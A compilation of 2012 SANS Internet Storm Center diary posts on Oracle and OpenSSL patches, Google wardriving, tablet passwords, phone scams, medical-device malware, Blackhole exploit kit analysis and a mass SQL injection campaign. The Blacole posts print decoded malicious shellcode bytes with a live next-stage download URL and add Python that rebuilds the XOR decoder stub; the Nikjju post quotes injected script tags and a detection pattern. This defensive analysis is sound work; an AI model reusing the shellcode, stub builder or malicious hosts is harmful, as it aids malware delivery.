Published: 2012-04-30

Patch for Oracle TNS Listener issue released !

Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability ( http://isc.sans.edu/diary.html?storyid=13069 )

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that a patch was released today - find details here ==> http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

Shortly after, reader R.P. pointed us to a page that had proof of concept ( with a video no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/

So get that maintenance window scheduled folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

Rob VandenBrink


Published: 2012-04-30

FCC posts Enquiry Documents on Google Wardriving

Remember back in 2010, Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted wireless networks found during its Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==> http://www.scribd.com/fullscreen/91652398

It's very interesting reading.  What I found most interesting in the paper was:

  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet’s output during their later analysis. Aside from the fact that anyone who's been in almost any SANS class would realize how wrong using the tool was, at least they didn't go write something from scratch.
  • Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license.
  • The suggestion and implementation for the data collection in the controversy came from unnamed engineers ("Engineer Doe" in the paper).  I found it really interesting how the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.

Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say "close only counts in horseshoes and hand grenades" - NOT in Compliance to Privacy rules !

Long story short, this document outlines how the manager(s) of the project trusted the engineer's word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision, right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have a budget to go down this road, so they are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever come back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of its primary directives is to keep an eye on privacy legislation, regulations and compliance with said legislation.  Though you can't fault the legal team if the question never gets directed their way (back to middle management).

From a project manager's point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  In most cases I've seen, the implications of changing the scope are all around impacts to budget and schedule, but in this case a good idea and a neat project (Google Streetview) ended up associated with activity that was later deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that either you exceeded the budget or schedule, mis-estimated the budget or schedule, or, in this case, didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more a lawyer than "Engineer Doe".


Rob VandenBrink


Published: 2012-04-30

An Impromptu Lesson on Passwords ..

I was reading the other night, which since I've migrated my library means that I was on my iPad.

My kid (he's 11) happened to be in the room, playing a game on one console or another.  I'm deep in my book, and he's deep in his game, when he pipes up with "Y'know Dad?"


"You should enable complex passwords on your tablet"
(Really, he said exactly that!  I guess he was in Settings / Security and wasn't playing a game after all ! )

"Why is that?" I said - (I'm hoping he comes up with a good answer here)

"Because if somebody takes your tablet, it'll be harder for them to guess your password"  (good answer!)

"Good idea - is there anything else I should know?"

"If they guess your password wrong 10 times, your tablet will get wiped out, so they won't get your stuff"  (Oh - bonus points!)

So aside from me having a really proud parent moment, why is this on the ISC page?  It's really good advice, that's why !

It's surprising how many people use the last 4 digits of their phone number, their birthday, or worse yet, their bank card PIN (yes, really) for a password, or have no password at all.  And yet, we have all kinds of confidential information on our tablets and phones - mostly in the form of corporate emails and sometimes documents.

As is the case in so many things, when we in the security community discuss tablet security, it's usually about the more advanced and interesting topics like remote management, remote data wipe or forensics.  These are valuable discussions - but in a lot of cases, basic (and I mean REALLY BASIC) security 101 advice to our user community will go a lot further in enhancing our security position.  Advice like I got from my kid:

  • Set a password !
  • Make sure that it's reasonably complex (letters and numbers)
  • Make sure that it's not a family member's name, phone number, birthday, bank PIN or something that might be found on your Facebook page
  • Set a screen saver timeout
  • Set the device to lock when you close the cover
  • Delete any documents that you are finished with - remember, the doc on your tablet is just an out of date copy

This may seem like really basic advice, and that's because it is.  But in the current wave of BYOD (Bring Your Own Device) policies that we're seeing at many organizations, we're seeing almost zero attention put on the security of the organization's data.  BYOD seems to be about transferring costs to our users on one hand, and keeping them happy by letting them use their tablets and phones at work (or school).

Good resources for iPad security (as well as Android and other tablets also) can be found in the SANS Reading Room ( http://www.sans.org/reading_room/ )

Vendors also maintain security documentation - Apple has some good (but basic) guidance at ==> http://www.apple.com/ipad/business/docs/iPad_Security.pdf

NIST has guidance for Android and Apple (though both are a bit out of date):

Please, use our COMMENT FORM to pass along any tablet security tips or links you may have.


Rob VandenBrink


Published: 2012-04-29

Who's tracking phone calls that target your computer? Stay Tuned to the ISC

The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010, Mark Hofman in May of 2011 and Daniel Wesemann in March of 2012.  This past week I got a call from someone that I thought was a regular old telemarketer until they said they were from a company in Texas providing Microsoft Support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand :)  I got to look at my logs by running "eventvwr" from the Run line prompt. In my application logs, I found out that warning and error messages were really "viruses" and I should not click on them because they would multiply and destroy my motherboard.  I also got to run "inf virus", which just opens the Windows inf folder and disregards the word "virus", and was asked if I had downloaded those files.  Of course I said no and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special software that would take care of all of this for me and she would help me.  She asked me to now type "www.logmein123.com" at the Run line.  At this point, 40 minutes later, I told her I had to go somewhere.  I asked if I could call her back because I sure didn't want all that stuff on my computer.  She said I could and gave me the number 773-701-5437 and said her name was Peggy.  I didn't have time to finish the call, but I sure would have liked to have gotten a VM fired up and seen what "special software" she had for me to install.

After the call, I started researching this type of scam and was surprised to see it seemed to date back to the 2009 time frame.  However, I could not find any statistics tracking this data.  Maybe I am just looking in the wrong place.  I saw guidance ranging from contacting your local law enforcement to sending an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend, nor is there any mention in their report released 26 April 2012 that summarized 2H2011.  It states "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 ("2H2011", July 1, 2011 through December 31, 2011)."   This type of phishing is something APWG doesn't appear to track at this time.

I consider these calls to still be phishing attempts, because APWG defines phishing as follows: "Phishing is a criminal mechanism employing both social engineering and technical subterfuge to steal consumers' personal identity data and financial account credentials."  The delivery vector is not email in this case but rather a phone call.  The end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?

At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.


Published: 2012-04-27

ISC Feature of the Week: Handler Created Tools


A couple of weeks ago we learned about the handlers at https://isc.sans.edu/diary/ISC+Feature+of+the+Week+Get+to+know+the+Handlers/12985. Today's feature highlights our Handler Created Tools page at https://isc.sans.edu/tools/handler_created.html.


  • A link to the handler tool page is now on https://isc.sans.edu/handler_list.html for handlers with tools posted!
  • Each handler section is separated and accessible directly by name ref #[handlername]
  • The tools are currently categorized by ones that can be:
    • Downloaded and run/installed
    • Accessed online
    • Available on a mobile platform


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-27

Critical Unpatched Oracle Vulnerability

Oracle's April "Critical Patch Update" listed a vulnerability in the TNS Listener service as one of the patched vulnerabilities. Sadly, it turns out that current versions of Oracle are not patched. Instead, the vulnerability will apparently only be fixed in future versions of the Oracle database. According to a statement from Oracle quoted by the discoverer of the vulnerability, the fix could possibly have had stability issues for current versions of Oracle. [1]

The vulnerability was responsibly reported to Oracle back in 2008. Upon release of the April CPU, Joxean Koret, who originally found the vulnerability, came forward with additional details including a proof of concept exploit, fully expecting that a patch was now available.

So in short: we have an unpatched remote code execution vulnerability in all current versions of Oracle, with proof of concept exploit code.

Joxean's details published after the CPU release also include some useful workarounds [2]. Please refer to the post for details.

[1] http://seclists.org/fulldisclosure/2012/Apr/343
[2] http://seclists.org/fulldisclosure/2012/Apr/204


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-26

Define Irony: A medical device with a Virus?


Information Week [1] is running a piece on FDA checks of medical hardware. After some review, a NIST [2] paper quickly jumped into my head and memories of past experiences washed forward. After emailing our handlers' alias, it seems that a few of us have some direct experience in this matter.

To plug the Critical Controls [3]: just about all of them apply, but to highlight two:

CC3: Secure Configuration for Hardware and Software [4]

CC5: Malware Defense [5]


An interesting point to this is that in some cases, if you patch a medical device, you can void its FDA certification. So a conundrum quickly surfaces: to patch the Windows Embedded "Critical Life Saving Device" or not to patch.

Horror story: a report of a fetal monitor crashing, while event correlation was tracking a malware-infected device on the same subnet. It turned out that the fetal monitor itself had been infected with malware; fortunately it was not in use at the time.

Another interesting confidence builder? "your IV pump is infected, but don't worry, it can't infect any of the *other* patient equipment" ... 

There are some clear root causes to the above scenarios, and something that is accelerating this is network convergence along with Bring Your Own Device programs. Since most things are transported over Ethernet [6], networks quickly converge as a cost-saving measure. It becomes more of a challenge to perform proper network segmentation and traffic separation when you converge N services plus X unmanaged devices.

Something we are observing more often are Physical Infrastructure Security systems (e.g. Building Management, Wireless Door lock systems, Camera Infrastructure, etc) being converged onto Ethernet networks that also host data services to users.

We have seen networks that converge voice (VoIP), video, data and iSCSI [7], and I can tell you that, quality of service aside, network segmentation on such a network can become a high-overhead process. The issue arises when cost savings cause decision makers to "Accept Risk" on converged networks, sometimes without fully understanding said risks.


Now, some things we can do in the short term:

- Make complaints to your local or state authority (here in the U.S. that's the FDA [8]). Although this diary is U.S.-centric, it is fairly safe to go down the "slippery slope" [9] and assume that a parallel of this issue exists in most modern medical institutions.

- Understand what is on your network, apply the critical controls and segment critical infrastructure to mitigate and reduce risk.

- Introduce segmentation controls: Private VLANs [10], firewalls for traffic separation, and access control lists [11] to restrict device communication.


As the cost savings of Ethernet drive network convergence, we have to take low-level measures to reduce risk. Remember, a VLAN is not secure traffic separation, only a logical traffic separation measure! It's like saying NAT [12] is a security protocol...


Richard Porter

--- ISC Handler On Duty

Keeping the watch from 35,000 Feet, with In-Flight Wifi on US Flight 1507


[1] http://www.informationweek.com/news/healthcare/security-privacy/232900818

[2] http://csrc.nist.gov/news_events/cps-workshop/cps-workshop_abstract-1_gupta.pdf

[3] http://www.sans.org/critical-security-controls/

[4] http://www.sans.org/cag/control/3.php

[5] http://www.sans.org/cag/control/5.php

[6] http://www.ieee802.org/3/

[7] http://tools.ietf.org/html/rfc3720

[8] http://www.fda.gov/

[9] http://en.wikipedia.org/wiki/List_of_fallacies

[10] http://en.wikipedia.org/wiki/Private_VLAN 

[11] http://en.wikipedia.org/wiki/Access_control_list 

[12] http://en.wikipedia.org/wiki/Network_address_translation




Published: 2012-04-25

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in Shell Code analysis is to "clean it up", in the case at hand here, we have to remove those spurious "script" tags

because they would trip us up in any of the following steps.

Once we're left with only the actual unicode escapes (%uxxyy...), we can turn these into raw bytes (note that each %uxxyy holds two bytes in little-endian order, so the byte order is swapped on the way out):

$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C

00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|

This doesn't result in anything all that useful yet. Shellcode is raw machine code, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).

Next step: Disassemble.

The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:

$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > decoded.c

results in

0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]

which is the correct format to turn it into

$ cat decoded.c

unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] };

int main() { }

which in turn can be compiled:

$ gcc -O0 -fno-inline decoded.c -o decoded.obj

which in turn can be disassembled:

$ objdump -M intel,i386 -D decoded.obj > decoded.asm

and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":

0000000000600840 <shellcode>:
600840: 41 inc ecx
600841: 41 inc ecx
600842: 41 inc ecx
600843: 41 inc ecx
600844: 66 83 e4 fc and sp,0xfffffffc
600848: fc cld
600849: eb 10 jmp 60085b <shellcode+0x1b>
60084b: 58 pop eax
60084c: 31 c9 xor ecx,ecx
60084e: 66 81 e9 57 fe sub cx,0xfe57
600853: 80 30 28 xor BYTE PTR [eax],0x28
600856: 40 inc eax
600857: e2 fa loop 600853 <shellcode+0x13>
600859: eb 05 jmp 600860 <shellcode+0x20>
60085b: e8 eb ff ff ff call 60084b <shellcode+0xb>
600860: ad lods eax,DWORD PTR ds:[esi]
600861: cc int3
600862: 5d pop ebp

A-Ha! Somebody is XOR-ing something here with 0x28 (the instruction at 600853).  If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.

Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP? Well .. the shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60084b" instruction at 60085b, the stack will contain 600860 as the return address. The instruction at 60084b then "pops" this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28. With ECX zeroed first, the "sub cx,0xfe57" leaves CX = 0x1a9, so the loop runs over 425 bytes, everything from 600860 to the end of the shellcode.

Let's try the same in Perl:

$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin

$ hexdump -C de-xored.bin | tail -5

00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |

Et voilà, we get our next stage URL.

If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.
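As an added example (this is not code from the diary), here is the same analysis done statically in Python: decode the %u escapes, locate the CALL/POP + XOR decoder stub by its byte pattern, read the key and the loop count out of the stub, and XOR only the bytes the loop would actually touch, so the stub itself is left alone. The stub bytes are the ones disassembled above; the payload, the 0x28-encoded sample and the 192.0.2.10 next-stage URL are constructed test data, not the real one from raw.js.

```python
import re
import struct

# Constructed test data (not the diary's raw.js): a hypothetical next-stage
# URL on an RFC 5737 test address, XOR-encoded with the diary's key 0x28.
XOR_KEY = 0x28
PAYLOAD_PLAIN = b"http://192.0.2.10/q.php?f=example&e=1\x00"


def build_stub(key, count):
    """Assemble the CALL/POP + XOR decoder stub disassembled in the diary.

    The bytes are the ones from the diary; only the key and the loop count
    (sub cx,imm16 with ecx zeroed first gives cx = -imm16) are parameters.
    """
    parts = [
        b"\x41\x41\x41\x41",                     # inc ecx x4: harmless filler
        b"\x66\x83\xe4\xfc",                     # and sp,0xfffc
        b"\xfc",                                 # cld
        b"\xeb\x10",                             # jmp +0x10 -> the CALL at the end
        b"\x58",                                 # pop eax: return address = first encoded byte
        b"\x31\xc9",                             # xor ecx,ecx
        b"\x66\x81\xe9" + struct.pack("<H", (-count) & 0xFFFF),  # sub cx,imm16
        b"\x80\x30" + bytes([key]),              # xor byte ptr [eax],key
        b"\x40",                                 # inc eax
        b"\xe2\xfa",                             # loop back to the xor
        b"\xeb\x05",                             # jmp over the CALL into decoded data
        b"\xe8\xeb\xff\xff\xff",                 # call back to the pop eax (GetPC)
    ]
    return b"".join(parts)


def to_unicode_escapes(data):
    """Encode bytes as the exploit kit does: %uXXYY carries bytes YY, XX."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%02x%02x" % (data[i + 1], data[i])
                   for i in range(0, len(data), 2))


def from_unicode_escapes(text):
    """Same as the diary's perl one-liner: %uXXYY becomes bytes YY, XX."""
    out = bytearray()
    for hi, lo in re.findall(r"%u([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})", text):
        out += bytes([int(lo, 16), int(hi, 16)])
    return bytes(out)


# Byte pattern of the decoder loop as it appears in the diary's disassembly.
DECODER = re.compile(
    rb"\x31\xc9"                # xor ecx,ecx
    rb"\x66\x81\xe9(..)"        # sub cx,imm16            -> loop count
    rb"\x80\x30(.)"             # xor byte ptr [eax],imm8 -> key
    rb"\x40\xe2\xfa"            # inc eax; loop
    rb"\xeb\x05"                # jmp over the CALL
    rb"\xe8....",               # call rel32 (its return address = payload start)
    re.DOTALL,
)


def find_xor_decoder(code):
    """Return (key, count, payload_offset), or None if the stub is not present."""
    m = DECODER.search(code)
    if m is None:
        return None
    imm16 = struct.unpack("<H", m.group(1))[0]
    count = (-imm16) & 0xFFFF      # cx = 0 - imm16
    key = m.group(2)[0]
    return key, count, m.end()     # the CALL's return address


def decode_payload(code):
    """XOR exactly the bytes the stub's loop would touch, nothing else."""
    found = find_xor_decoder(code)
    if found is None:
        raise ValueError("no CALL/POP XOR decoder stub found")
    key, count, start = found
    return bytes(b ^ key for b in code[start:start + count])


URL = re.compile(rb"https?://[\x21-\x7e]+")


def extract_urls(data):
    return [u.decode("ascii") for u in URL.findall(data)]


SAMPLE_SHELLCODE = (build_stub(XOR_KEY, len(PAYLOAD_PLAIN))
                    + bytes(b ^ XOR_KEY for b in PAYLOAD_PLAIN))
SAMPLE_RAW_JS = to_unicode_escapes(SAMPLE_SHELLCODE)   # what a raw.js would hold

if __name__ == "__main__":
    code = from_unicode_escapes(SAMPLE_RAW_JS)
    key, count, start = find_xor_decoder(code)
    print("key=0x%02x loop_count=%d payload_offset=0x%x" % (key, count, start))
    print(extract_urls(decode_payload(code)))
```

Feeding build_stub(0x28, 0x1a9) the diary's own key and count reproduces the first 32 bytes of decoded.bin above byte for byte, which is a quick sanity check that the stub pattern is the right one. The pattern is tied to this particular stub shape; a different shellcode family will need its own signature, but the approach (find the GetPC trick, recover key and length from the immediates, decode only the loop's range) carries over.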



Published: 2012-04-25

Blacole's obfuscated JavaScript

Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.

Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.

Often, this actually works. The current wave of Blackhole (Blacole) exploit kits is a good example - it took anti-virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on VirusTotal.

Here's what the Blacole obfuscated Javascript looks like:

Unlike "older" obfuscation methods, this "Blacole" encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:


None of this will run in command line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawet are doing a pretty good job at this, but often also trip up.

If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find

This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is >25 and <52, 26 gets added to it. If it is >=52 and <78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a "poor man's Caesar Cipher", swapping out one letter against another.

Something we can readily reproduce in a couple lines of Perl :)

$ cat decode.pl
#!/usr/bin/perl -w
# Undo Blacole's character swap: codes 26..51 move up by 26, codes 52..77
# move down by 26, everything else passes through unchanged. The mapping is
# its own inverse, so the same loop both encodes and decodes.
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    $o = ord(substr($_, $i, 1));
    if (($o>25) && ($o<52)) { $k = $o + 26; }
    elsif (($o>=52) && ($o<78)) { $k = $o - 26; }
    else { $k = $o; }
    print chr($k);
  }
}

And, lo and behold:

$ cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.



Published: 2012-04-24

OpenSSL reissues fix for ASN1 BIO vulnerability

OpenSSL has posted an updated advisory today indicating the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability issue for OpenSSL version 0.9.8.

Please note that this latest issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i already contain a patch as released on the 19th sufficient to correct CVE-2012-2110.

Please upgrade to 0.9.8w.




Published: 2012-04-23

Continued interest in Nikjju mass SQL injection campaign

Readers continue to write in conveying updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.NET sites are targeted and scripts are inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php ></script> and the resulting fake/rogue AV campaigns they subject victims to.

Infected site count estimates vary wildly, but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the Lilupophilupop campaign, but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.
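As an added example (not part of the diary), here is a small Python checker for the injected tags you can point at your own rendered pages or exported database text. It matches the spacing variants shown above, optional quotes and defanged hxxp:// copies, ignores same-site script includes, and reports only hits on the two hosts named in the diary. The page fragment it scans is constructed for the example.

```python
import re

# Hosts named in the diary; extend this from your own logs as the campaign moves.
INJECTED_HOSTS = {"nikjju.com", "hgbyju.com"}

# Tolerates "src=" vs "src = ", optional quotes, defanged hxxp:// copies and
# attribute junk before the closing ">". Only off-site includes can match,
# because a scheme and host are required.
INJECTED_SCRIPT = re.compile(
    rb"""<script\s+src\s*=\s*["']?\s*(?:hxxp|http)s?://([^/\s"'>]+)(/[^\s"'>]*)?[^>]*>\s*</script\s*>""",
    re.IGNORECASE,
)


def find_remote_scripts(html):
    """Return (host, path) for every <script src=...></script> that points off-site."""
    hits = []
    for m in INJECTED_SCRIPT.finditer(html):
        host = m.group(1).decode("latin-1").lower()
        path = (m.group(2) or b"").decode("latin-1")
        hits.append((host, path))
    return hits


def nikjju_hits(html):
    """Only the hits on the hosts used by this campaign."""
    return [(h, p) for h, p in find_remote_scripts(html) if h in INJECTED_HOSTS]


# Constructed page fragment: a mass SQL injection appends the tag to text
# columns, so it shows up wherever those columns are rendered, here in the
# title and in a product description. The app.js line is legitimate.
SAMPLE_HTML = b"""<html><head>
<title>Widgets</title><script src=http://nikjju.com/r.php></script>
<script src="/js/app.js"></script></head>
<body><p>Blue widget, 10mm</p><script src = http://hgbyju.com/r.php ></script>
<p>&copy; 2012 Example Corp</p></body></html>"""

if __name__ == "__main__":
    for host, path in nikjju_hits(SAMPLE_HTML):
        print("injected script from %s%s" % (host, path))
```

Run it over a crawl of your own site or over a dump of the text columns the application renders; a hit in a column that should never contain markup is the SQL injection itself, not just its symptom, and that column's input path is where the fix belongs.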

As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec




Published: 2012-04-23

Comments open for NIST-proposed updates to Digital Signature Standard

The comment period for National Institute of Standards and Technology (NIST) proposed changes to the Digital Signature Standard (FIPS 186-3) is open until May 25, 2012. Submit comments via  fips_186-3_change_notice at nist dot gov, with ''186-3 Change Notice'' in the subject line.

The proposed changes include:

  • "clarification on how to implement the digital signature algorithms approved in the standard: the Digital Signature Algorithm (DSA), the Elliptic Curve Digital Signature Algorithm (ECDSA) and the Rivest-Shamir-Adelman algorithm (RSA)"
  • "allowing the use of additional, approved random number generators, which are used to generate the cryptographic keys used for the generation and verification of digital signatures"

NIST indicates that "the standard provides a means of guaranteeing authenticity in the digital world by means of operations based on complex math that are all but impossible to forge" but that "updates to the standard are still necessary as technology changes."

Comment and feedback on your digital signature implementations are welcome via our comments form.


Russ McRee | @holisticinfosec



Published: 2012-04-23

Emergency Operations Centers & Security Incident Management: A Correlation

I spent last Tuesday (17APR2012) taking orientation training at the State Emergency Operations Center (SEOC), a facility operated by the Washington State Military Department, Emergency Management Division. WA SEOC is a fully realized, extremely robust EOC with full authority to fulfill disaster and emergency coordination at the state level. The training was designed to orient attendees to serving or assisting when the EOC is activated during emergencies and disasters.

I was, as I have been during past EOC training or drills I've attended, drawn to the immediate parallels between EOC activity and mature security incident response programs.
Anyone who participates in or serves in a security incident response/management role has likely had the grave displeasure of being part of incident response gone bad. You know the event; it's seared into your memory. No incident command, no structure, everyone running around with their hair on fire, endless FUD and speculation, broken communication streams, and more damage being done than good. I for one cannot and will not tolerate events unfolding in this manner, and am always thrilled when I see training and robust processes take over during major events.
EOCs are designed to do this right at a scale few of us can imagine or fathom.
It's one thing to lead your organization through a server compromise or a DDoS attack.
It's quite another to do so where the lives of citizens and millions of dollars of property are in the mix. Life and death decisions change your perspective.
All of which is a long way of getting to the point: there is much to be learned and utilized from the incident management structure utilized by EOCs as it pertains to information security incident response and management.
I'm a huge proponent of "everything in its place, a place for everything" during incidents. Everyone should know their role, what swim lane they should be in, and how to garner the assistance and support they may need.
In an EOC you'll note that seating is arranged in pods. These pods each pertain to an ESF or Emergency Support Function. Such functions include communications (ESF 2), logistics (ESF 7), public safety and security (ESF 13), external affairs (ESF 15), and defense support to civil authorities (ESF 20). 
(Photo: Washington State EOC)
Not every ESF has a direct match to a role during an information security incident or major event - hopefully you won't need housing, public health, or search and rescue functions (we lost Bobby in the data center!) - but allow me to strengthen my claims to correlation.
The ESF 2 function includes "protection, restoration, and sustainment of national cyber and information technology resources." Check, that sounds like an incident response analyst and/or manager. 
ESF 7 includes logistics planning, management, and sustainment capability as well as resource support. Ever try to muddle through a major information security incident without your operations teams at the ready to perform systems and network functions? 
ESF 13 includes security planning and technical resource assistance along with resource security. Roger that, I see a mitigations working group in the making here, yes? 
ESF 15 provides protective action guidance as well as media and community relations. Indeed. Sounds like the all important information security advisory (patch now, avoid website x) or the pressing need for a good PR response when your high traffic website was defaced.
ESF 20 offers guidance to officials on the coordination of military resources in support of operations during response and recovery. Ack. Subject matter expertise, vulnerability assessment post-mitigation and remediation, after action reports (lessons learned), and defensive tactics oversight.
You get my point. Having a well defined, practiced (drill, drill, drill!) incident management system that springs into action like a well oiled machine is of extraordinary value during major information security incidents.
Following are some resources for you to consider.
Check out FEMA's National Incident Management System (NIMS). You can take NIMS training online via FEMA's Emergency Management Institute. I suggest starting with IS-100.b Introduction to Incident Command System, IS-200.b ICS for Single Resources and Initial Action Incidents, and IS-700.a National Incident Management System (NIMS) An Introduction. I've taken these, as well as four other ISP courses as part of requirements for the Military Emergency Management Specialist (MEMS) Basic level, and continue to see content matches to my role in security incident management. Also familiarize yourself with the National Response Framework.
If you've noted similar relationships with emergency management practices and information security response and incident management, feel free to share with the readership via the comments form along with any questions you may have.


Published: 2012-04-21

WordPress Release Security Update

WordPress released a security update (version 3.3.2) that fixes 3 external libraries (Plupload, SWFUpload and SWFObject), a privilege escalation issue and cross-site scripting (XSS) issues, as well as 5 other bugs. The change log is posted here [1], the advisory is posted here [2] and you can download the update here [3].

[1] http://core.trac.wordpress.org/log/branches/3.3?rev=20552&stop_rev=20087
[2] http://wordpress.org/news/2012/04/wordpress-3-3-2/
[3] http://wordpress.org/download/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-19

